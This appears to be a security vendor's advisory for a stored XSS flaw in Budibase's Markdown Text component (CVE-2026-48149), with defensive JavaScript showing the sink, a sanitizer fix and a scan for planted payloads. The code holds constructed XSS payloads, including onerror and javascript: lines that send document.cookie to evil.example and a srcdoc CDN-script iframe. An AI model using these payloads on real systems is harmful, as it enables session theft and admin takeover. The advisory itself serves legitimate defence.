HarborGuard / CVE
HIGH | CVE-2026-48149 | CNA: GitHub_M

CVE-2026-48149: Budibase: Stored XSS in Text component: BASIC users execute JS in admin session via MarkdownViewer innerHTML + CDN+srcdoc CSP bypass

Budibase is an open-source low-code platform. Prior to 3.39.0, the Budibase Text component renders markdown by assigning marked.parse(markdown) straight to innerHTML with no sanitizer (packages/bbui/src/Markdown/MarkdownViewer.svelte:22). Any column a builder binds to a Text component in Markdown mode is a stored-XSS sink writable by every BASIC app user with WRITE on the underlying table. This vulnerability is fixed in 3.39.0.
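The sink and its fix side by side, as an added example that is not Budibase's own code. renderMarkdownStandIn is a hypothetical stand-in for marked: it reproduces the one property that matters for this bug, namely that markdown renderers emit raw inline HTML verbatim, so whatever a BASIC user stores in the column reaches innerHTML unchanged. renderUnsafe is the pre-3.39.0 shape; sanitizeHtml is a minimal allow-list sanitizer written for this page, and the payloads are constructed.

```javascript
// Added example, not Budibase's code. renderMarkdownStandIn is a hypothetical
// stand-in for marked: it mimics the one property that matters here, which is
// that markdown renderers emit raw inline HTML verbatim. sanitizeHtml is a
// minimal allow-list sanitizer written for this page (use DOMPurify in real code).

function renderMarkdownStandIn(md) {
  // Handles '# heading', **bold** and [text](url); everything else, including
  // HTML typed by the author, passes through untouched.
  return md
    .split("\n")
    .map((line) => {
      if (line.startsWith("# ")) return `<h1>${line.slice(2)}</h1>`;
      const inline = line
        .replace(/\*\*(.+?)\*\*/g, "<strong>$1</strong>")
        .replace(/\[([^\]]+)\]\(([^)\s]+)\)/g, '<a href="$2">$1</a>');
      return `<p>${inline}</p>`;
    })
    .join("\n");
}

// Pre-3.39.0 shape (MarkdownViewer.svelte): renderer output goes straight to innerHTML.
function renderUnsafe(markdown) {
  return renderMarkdownStandIn(markdown);
}

// Allow-list: anything not listed is dropped, so script, iframe (and with it
// srcdoc), img, style and every on* attribute never reach innerHTML.
const ALLOWED_TAGS = new Set(["h1", "h2", "h3", "p", "strong", "em", "ul", "ol", "li", "a", "code", "pre", "br", "blockquote"]);
const ALLOWED_ATTRS = { a: new Set(["href", "title"]) };
const SAFE_HREF = /^(https?:|mailto:|\/|#)/i; // scheme allow-list, so "java\tscript:" fails too

function escapeText(text) {
  return text.replace(/</g, "&lt;").replace(/>/g, "&gt;");
}

function sanitizeHtml(html) {
  const out = [];
  const tagRe = /<\/?([a-zA-Z][a-zA-Z0-9]*)\b([^>]*)>/g;
  const attrRe = /([a-zA-Z-]+)(?:\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s"'>]+)))?/g;
  let last = 0;
  let m;
  while ((m = tagRe.exec(html)) !== null) {
    out.push(escapeText(html.slice(last, m.index)));
    last = tagRe.lastIndex;
    const tag = m[1].toLowerCase();
    if (!ALLOWED_TAGS.has(tag)) continue; // drop the tag, keep surrounding text
    if (m[0].startsWith("</")) {
      out.push(`</${tag}>`);
      continue;
    }
    const kept = [];
    for (const a of m[2].matchAll(attrRe)) {
      const name = a[1].toLowerCase();
      if (!(ALLOWED_ATTRS[tag] && ALLOWED_ATTRS[tag].has(name))) continue;
      const value = a[2] ?? a[3] ?? a[4] ?? "";
      if (name === "href" && !SAFE_HREF.test(value.trim())) continue;
      kept.push(` ${name}="${value.replace(/"/g, "&quot;")}"`);
    }
    out.push(`<${tag}${kept.join("")}>`);
  }
  out.push(escapeText(html.slice(last)));
  return out.join("");
}

// Fixed shape: same renderer, sanitized before assignment to innerHTML.
function renderSafe(markdown) {
  return sanitizeHtml(renderMarkdownStandIn(markdown));
}

// Quick check used below: does the HTML still carry anything that can run script?
function hasActiveContent(html) {
  return /<(script|iframe|img|object|embed|svg)\b|\son[a-z]+\s*=|srcdoc=|javascript:/i.test(html);
}

// Constructed payloads of the kind a BASIC user with WRITE could store in a bound column.
const PAYLOADS = {
  eventHandler: '<img src=x onerror="alert(document.cookie)">',
  srcdocFrame: '<iframe srcdoc="<script src=https://cdn.example/x.js></script>"></iframe>',
  jsLink: "[profile](javascript:document.location='https://evil.example/?c='+document.cookie)",
};
const BENIGN = "# Hello\n**bold** and [docs](https://docs.example)";

for (const [name, md] of Object.entries(PAYLOADS)) {
  console.log(name, "unsafe:", hasActiveContent(renderUnsafe(md)), "safe:", hasActiveContent(renderSafe(md)));
}
```

The point is the allow-list discipline (drop every element and attribute not explicitly permitted, including srcdoc and on* handlers, and validate href schemes by allow-list), not the tokenizer: a regex tokenizer splits `srcdoc="<script ...>"` differently from a browser's parser, which is why a real fix should sanitize with a parser-backed library such as DOMPurify rather than hand-rolled matching.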

HarborGuard Analysis

Synopsis

Stored cross-site scripting (XSS) in Budibase's Text component allows any BASIC app user with write access to a bound table column to inject arbitrary JavaScript into that column's content, which then executes in the browser session of anyone viewing the rendered markdown. The flaw is reachable over the network without elevated privileges, and successful exploitation gives the attacker full read and write access within the victim's active session, including admin sessions. The upstream fix is Budibase 3.39.0; HarborGuard tracks this advisory and makes a patched-image rebuild available once the fixed version has been ingested.

HarborGuard Coverage

Detection

Detection is available across every HarborGuard environment: the CVE is ingested from upstream advisory feeds within minutes of publication and matched against customer images, including custom-built Budibase images, across all connected registries and CI pipelines.

Available
Triage

HarborGuard scores this finding at CVSS 8.1 (HIGH) and weights it against each environment's compliance policy to determine urgency and routing, directing the alert to the team inbox configured for the affected workload inside each customer org.

Available
Patch

The upstream fix is Budibase 3.39.0. HarborGuard re-checks the Budibase advisory on every ingest cycle and makes a patched-image rebuild available automatically once the fixed version has been ingested. For customers who opt into auto-remediation, the rebuild, regression run, and PR against affected workloads are triggered without manual intervention.

Pending upstream

Exploit Conditions

  • Network reachability: Required

    The attacker must reach the Budibase application over the network to submit the malicious markdown to the vulnerable table column.

  • Authentication: Required

    Any low-privilege BASIC app account with WRITE permission on the bound table is sufficient to plant the payload; no admin account is needed to inject. The payload executes in whatever session later views the content, which is what makes admin sessions reachable from a BASIC account.

  • Victim interaction: Not required

    No social engineering or deliberate victim action is needed beyond loading a page that renders the bound column in Markdown mode, which happens passively during normal application use (hence UI:N in the vector).

  • Attack complexity: Low

    The exploit is deterministic: marked.parse passes raw inline HTML through, and the result is assigned to innerHTML, so a single write of a payload such as an element with an on* handler or an iframe with srcdoc is enough. No race, memory-layout knowledge, or special environmental state is involved.

Blast Radius

  • An attacker reads all data accessible in the victim's browser session: any application data visible to the logged-in user and any token or cookie exposed to JavaScript. HttpOnly cookies are not readable directly, but the injected script can still issue authenticated requests from the victim's session, so the session is usable either way.
  • An attacker performs state-changing actions on behalf of the victim, including modifying records, creating users, or changing configuration, using the victim's existing permissions.
  • If the payload executes in an admin session, the attacker gains full administrative control over the Budibase instance for the duration of that session.

How HarborGuard Handles This

Available on HarborGuard: this CVE is matched against images on every ingest cycle. The upstream fix is Budibase 3.39.0, and upgrading is the remediation. Until a workload is upgraded, compensating controls worth evaluating include isolating the Budibase service behind a network policy that restricts which internal services it can reach, tightening the Content Security Policy (the advisory title records that the existing policy was bypassed using an allow-listed CDN plus an srcdoc iframe, so a tightened policy has to remove that CDN from script-src rather than only blocking inline script), and disabling Markdown rendering on any Text component bound to user-writable columns. HarborGuard makes a patched-image rebuild available once the fixed version has been ingested. For customers who opt into auto-remediation, and where compliance policy permits, HarborGuard triggers the rebuild, runs regression tests, and opens a PR against affected workloads automatically.
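Before or alongside the compensating controls above, an operator will want to know whether a payload has already been planted. The sweep below is an added example, not HarborGuard's or Budibase's code: it walks exported rows and flags string columns carrying HTML that would run script once rendered through an unsanitized innerHTML sink. The row shape ({_id, tableId, fields}) and the indicator list are assumptions made for this page, and the sample rows are constructed.

```javascript
// Added example, not HarborGuard's or Budibase's code: sweep exported rows for
// markdown/HTML that would run script once rendered through an unsanitized
// innerHTML sink. The row shape ({_id, tableId, fields}) is an assumption for
// this page; map it to your own export format.

const INDICATORS = [
  { name: "script-or-frame element", re: /<\s*(script|iframe|object|embed|svg|math|meta|link|base)\b/i },
  { name: "inline event handler", re: /<[^>]*\son[a-z]+\s*=/i },
  { name: "srcdoc attribute", re: /<[^>]*\bsrcdoc\s*=/i },
  { name: "javascript: URL attribute", re: /(href|src|action|formaction)\s*=\s*["']?\s*javascript:/i },
  { name: "javascript: markdown link", re: /\]\(\s*javascript:/i },
];

// Code point to string, ignoring out-of-range values an attacker might plant to crash the scanner.
const cp = (n) => (n >= 0 && n <= 0x10ffff ? String.fromCodePoint(n) : "");

// Undo the cheap obfuscations before matching: HTML entities (browsers decode
// them inside attribute values, so javascript&#58; works in an href), URL
// encoding, and control characters (browsers strip tabs/newlines inside URLs).
function normalize(s) {
  let t = s
    .replace(/&#x([0-9a-f]+);?/gi, (_, h) => cp(parseInt(h, 16)))
    .replace(/&#(\d+);?/g, (_, d) => cp(parseInt(d, 10)))
    .replace(/&lt;/gi, "<")
    .replace(/&gt;/gi, ">")
    .replace(/&quot;/gi, '"')
    .replace(/&amp;/gi, "&");
  try {
    t = decodeURIComponent(t);
  } catch (e) {
    // not valid percent-encoding; keep the entity-decoded text
  }
  return t.replace(/[\x00-\x1f]/g, "");
}

// Returns one finding per (row, column) whose raw or normalized value matches any indicator.
function scanRows(rows) {
  const findings = [];
  for (const row of rows) {
    for (const [column, value] of Object.entries(row.fields)) {
      if (typeof value !== "string") continue;
      const views = [value, normalize(value)];
      const indicators = INDICATORS
        .filter((ind) => views.some((v) => ind.re.test(v)))
        .map((ind) => ind.name);
      if (indicators.length > 0) {
        findings.push({ table: row.tableId, rowId: row._id, column, indicators });
      }
    }
  }
  return findings;
}

// Constructed sample export: one clean row and three planted payloads.
const SAMPLE_ROWS = [
  { _id: "ro_1", tableId: "ta_notes", fields: { title: "Plan", body: "# Q3 plan\n\nShip **v2** by [Friday](https://cal.example).", priority: 2 } },
  { _id: "ro_2", tableId: "ta_notes", fields: { title: "hi", body: 'nothing here <img src=x onerror="fetch(\'https://evil.example/?c=\'+document.cookie)">' } },
  { _id: "ro_3", tableId: "ta_notes", fields: { title: "x", body: '<iframe srcdoc="&lt;script src=https://cdn.example/lib.js&gt;&lt;/script&gt;"></iframe>' } },
  { _id: "ro_4", tableId: "ta_tickets", fields: { summary: "[details](javascript&#58;alert(document.domain))" } },
];

for (const f of scanRows(SAMPLE_ROWS)) {
  console.log(`${f.table}/${f.rowId}.${f.column}: ${f.indicators.join(", ")}`);
}
```

Treat hits as triage leads to review by hand, and treat a clean sweep as absence of the obvious, not proof of absence: markdown rendered through innerHTML has more vectors than any indicator list covers, which is why the upgrade to 3.39.0, not the sweep, is the remediation.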


Metrics

CVSS v3.1: 8.1
Severity: HIGH
Fixed in: 3.39.0
Affected products: 1
Affected packages
  • Budibase / budibase < 3.39.0
CVSS vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N